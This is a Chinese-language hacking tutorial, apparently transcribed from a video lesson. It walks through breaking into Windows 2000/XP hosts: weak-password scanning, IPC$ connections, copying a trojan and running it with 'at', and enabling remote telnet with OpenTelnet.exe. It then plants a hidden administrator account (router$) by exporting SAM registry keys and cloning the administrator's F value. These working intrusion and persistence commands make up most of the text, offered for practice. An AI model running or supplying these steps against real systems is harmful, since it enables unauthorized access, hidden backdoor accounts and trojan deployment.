一,dos命令入侵
入侵2000 ;
1.扫弱口令(怎么扫后面会讲到) 2.建ipc非空连接 3.映射对方硬盘,复制木马(可以直接用copy命令) 4.net time 命令查询远程主机时间 5. at 命令指定时间运行木马,大家自己结合前面讲到的实验下
入侵xp:(2000也适用)
1.扫弱口令 2.开远程主机telnet服务 3.telnet到远程主机 4.执行命令下载木马或添加隐藏账户
由于xp的虚拟机老是出错,就用2000做实验了
开启telnet服务的方法:
opentelnet.exe ,远程开telnet的工具
命令:OpenTelnet.exe //server username password 验证方式 端口号
验证方式从0到2.一般1成功的几率比较大,端口号自己定了
例如:OpenTelnet.exe //192.168.1.1 administrator "" 1 23
就是这个工具,放到c盘去,一会好执行命令
下面我们来演示下
1.ping一下对方ip,简单探测下对方的系统类型,这里返回值是128,判断是2000或xp,我们已经扫描到它的用户名和密码,可以建个ipc连接来判断是不是对的,实际中可以省略这一步,直接开telnet,这里为了让大家熟悉下命令
net use //192.168.174.129/ipc$ "longyu" /user:administrator
命令成功完成,下面我们先在2000中看下他的服务,没有开teknet,禁用掉了,如果这时候我们telnet,看下返回信息
下面我们就远程打开它的telnet服务
OpenTelnet.exe //192.168.174.129 administrator "longyu" 1 23
Connecting //192.168.174.129...Canncel Successfully!
Successfully! 连接成功
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service... 开启服务
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 23. You can try:"telnet ip 23", to connect the server!
Disconnecting server...Successfully! 端口号是 23
下面我们再来连下,这样就得到了对方的cmdshell,想做什么都可以了。
sc.exe 系统自带开启服务工具,本地开启telnet服务(有时候会用到)
我们用这个工具在本地开启telnet服务有时候也会用到开启at服务
在使用sc命令之前必须已经得到对方的cmd shell,也就是已经可以执行命令
在cmd下可有两种方法打开,net和sc,net用于打开没有被禁用的服务,语法是:
net start 服务名
net stop 服务名
前面已经用 关掉系统防火墙举过例子了
用sc可打开被禁用的服务,语法是:
sc config 服务名 start= demand //手动
sc config 服务名 start= auto //自动
sc config 服务名 start= disabled //禁用
sc start 服务名
sc stop 服务名
大家自己看看了
注:
1)服务名不一定是你在服务面板看到的那个名,例如,你要打开被禁用的telnet服务,
sc config telnet start= auto,报错:[SC] OpenService FAILED 1060,因为telnet的服务名不是telnet而是tlntsvr,
sc config tlntsvr start= auto
就OK了,在服务面板里查看telnet属性,从可执行文件的路径里可看到服务程序名,即命令中的服务名。
2)start=后面有空格,少了就有错
网上还有一个开telnet的脚本,效果也不错,大家可以去试试。
下面我们先禁用在开下,需要先注销,现在telnet还是开启的呢,注销好了
我们再 看下,没有开启telnet
看到效果了吧。开telnet先将这么多了
关于虚拟机XP的ipc入侵遇到的问题很多,有时候只能用2000来做实验,不只是远程主机一些设置的原因,自己的主机也要设置好,哪里做的不好还请多多担待,后面会给大家补一个XP ipc入侵的实例。
二 ,dos命令添加超级隐藏账户 (xp下适用)
用到的命令:telnet ,net user ,at,
系统用户的各个键值都在 注册表 :HKEY_LOCAL_MACHINE/SAM/SAM/ ,这一项里,但是普通用户是没有权限查看和修改的,必须先把权限提升一下才可以,
开始,运行
这里我们是运行的regedt32, 而不是regedit 在本机演示下修改权限。如果能用3389连到对方也可以这样改。
但是现在我们是命令行模式下,是不可能在远程电脑上直接修改权限的,所以这里我们用at命令帮助我们提升权限,前面说过at命令是系统权限的,注册表对此是没有限制的,所以就用它了。
第一步,telnet 到对方,得到cmd shell
这里用本机 telnet xp ,然后添加一个隐藏账户
telnet 192.168.174.128
好了,进到xp中了
第二步。sc开启at服务,先看下at服务开了没有,就是看Task Scheduler ,
好,我们来开下
sc 开启at服务:
sc config Schedule start= DEMAND
net start schedule
好了,已经启动了
第三步,执行命令添加隐藏账户
net user router$ longyu /add 添加用户名为router$ 密码为longyu的隐藏账户
(隐藏账户就是最后有$的账户,在dos命令下是看不到的,倒是在用户管理下可以看到)
net localgroup Administrators router$ /add 将router$加入到管理组
查询时间 net time //127.0.0.1
at 16:43 C:/WINDOWS/regedit.exe /e longyu.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/ 导出注册表项
这里一定要是一整行复制过去,要不会出错,导出的longyu.reg 在 windows文件夹里,好了,我们看下去。说错了,不好意思。在system32里面
本机搭建ftp服务器。时间到了之后将导出的注册表项用ftp复制到本机
看下有没有
下面就是我们手工编辑了
将HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/导出为longyu.reg,用记事本打开文件进行编辑,将超级用户administration对应的项000001F4下的键"F"的值复制(一般都是这一个),并覆盖router$对应的项下的键的值。这样就算修改好了,
在命令行下执行net user router$ /del将用户router$ 删除
我们还是先把修改好的reg文件上传过去
ftp命令 get 到远程主机c盘
然后再将修改后的reg文件双击导入。这里我们还是用命令导入吧
at 16:56 C:/WINDOWS/regedit.exe /s longyu2.reg
查下时间,这里大家选择时间的时候一定要充裕,多一点没关系,最好不要少了
等会用net user router$ 看下,再用telnet登录下看看成功吗 好了,看下
管理里面看不到,但是确实存在的。登录成功
这样就建好了,看下效果。
此方法适用于xp,在2000或2003下会在管理的用户栏里看到,不是很完美。
在后面的服务器入侵里面还会讲到克隆管理员帐号,比这个方法要好,这里主要还是让大家熟悉些命令。
好了,这节课就到这里,还是多多练习吧,拜拜。